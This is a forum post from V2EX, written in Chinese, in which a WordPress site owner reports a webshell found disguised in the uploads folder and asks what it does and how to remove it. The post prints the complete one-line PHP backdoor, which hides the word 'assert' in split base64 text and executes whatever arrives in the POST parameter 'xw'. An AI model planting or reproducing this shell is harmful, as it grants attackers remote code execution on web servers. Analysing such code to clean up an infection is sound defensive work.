今天突然收到阿里云发来的短信,说我的 WP 网站有后门( Webshell )文件待处理,打开一看,目录是 /wp-content/uploads/2022/03/1.php
好家伙,直接伪装了图片上传了了一个脚本文件,脚本文件如下:
<?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>
现在一打开网站就是输出 phpinfo 信息,不太懂这段代码具体做了啥,如何清除这段木马?
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.